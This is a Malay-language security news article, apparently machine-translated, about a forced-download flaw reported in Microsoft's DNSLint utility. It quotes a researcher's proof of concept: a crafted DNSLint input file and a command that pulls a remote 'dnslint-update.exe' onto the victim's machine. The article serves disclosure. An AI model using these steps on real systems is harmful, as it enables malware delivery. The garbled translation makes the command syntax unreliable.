Suis QL Utiliti DNSLint Microsoft Boleh Membolehkan Fail Jauh Dimuat turun

Keselamatan / Suis QL Utiliti DNSLint Microsoft Boleh Membolehkan Fail Jauh Dimuat turun 2 minit membaca

Microsoft Corporation



Microsoft DNSLint utiliti berfungsi untuk mendiagnosis masalah pencarian nama Sistem Nama Domain (DNS) yang berkaitan dengan alamat IP yang diperuntukkan ke pelayan web yang berbeza yang diakses melalui penyemak imbas. Ia tidak termasuk sebagai sebahagian daripada pakej Windows asas tetapi boleh dimuat turun dari laman web Microsoft secara percuma. Kerentanan akses jauh dinilai 7.6 (kritikal) pada CVSS 3.0 skala didapati mempengaruhi utiliti ini menyebabkan pemindahan paksa oleh muat turun berlaku.

Kerentanan muncul dari kenyataan bahawa DNSLint tidak menyemak nama domain ketika menguraikan fail ujian DNS mengikut suis '/ ql'. Sekiranya pengguna akhir berjaya menggunakan fail seperti itu yang mengandungi skrip atau kod binari yang bertentangan dengan maklumat nama domain yang biasanya dinanti, sistem dapat menjadi risiko di mana menjadi mudah untuk memuat turun paksa. Sekiranya hal ini terjadi, penggodam dapat mendorong paksa memuat turun fail berbahaya yang dapat memuat turun dan melaksanakan perintah jarak jauh ketika diakses melalui penyemak imbas web. Muat turun akan disimpan ke lokasi sistem tempatan dan akses keselamatan yang cepat dan, dengan melihat bahawa fail tersebut berasal dari lokasi yang diketahui pada pemacu cakera, pengguna dapat cenderung membiarkan yang dapat dieksekusi terus maju. Setelah fail berniat jahat diberikan hak istimewa, ia dapat menjalankan kod yang dimaksudkan dari jauh dan menjejaskan keselamatan dan privasi pengguna.



Halaman John dari hip3rlinx telah menulis bukti konsep yang mensimulasikan kerentanan ini, menjelaskan bahawa fail yang tidak diinginkan dapat memuat turun seperti berikut ketika skrip atau fail teks rujukan binari digunakan bertentangan dengan nama domain:



dnslint.exe / v / y / d 'MALWARE-FILE' / s X.X.X.X / r 'myreport'



Dalam konteks utiliti DNSLint, berikut menunjukkan bagaimana kerentanan dapat dieksploitasi untuk memperkenalkan malware ke dalam sistem.

1) 'dnslint-update.exe' pada dir root pelayan web jauh.
2) 'pelayan.txt'
DNSLint
; Ini adalah contoh fail input DNSLint
+ Pelayan DNS ini dipanggil: dns1.cp.msft.net
[dns ~ pelayan] X.X.X.X
, a, r; Satu rekod
X.X.X.X, ptr, r; Rekod PTR
test1, cname, r; rekod CNAME
test2, mx, r; rekod MX
3) dnslint.exe / ql pelayan.txt

Kod di atas tidak diubah seperti yang digariskan oleh hak hyp3rlinx ke kandungan ini. Mengungkap kerentanan ini, nampaknya belum ada kemas kini tambalan untuk menyelesaikan masalah ini. Kod CVE masih harus diberikan untuk kerentanan ini dan ia harus diidentifikasi dan ditulis oleh Microsoft dalam buletin keselamatan rasmi mengenai perkara itu.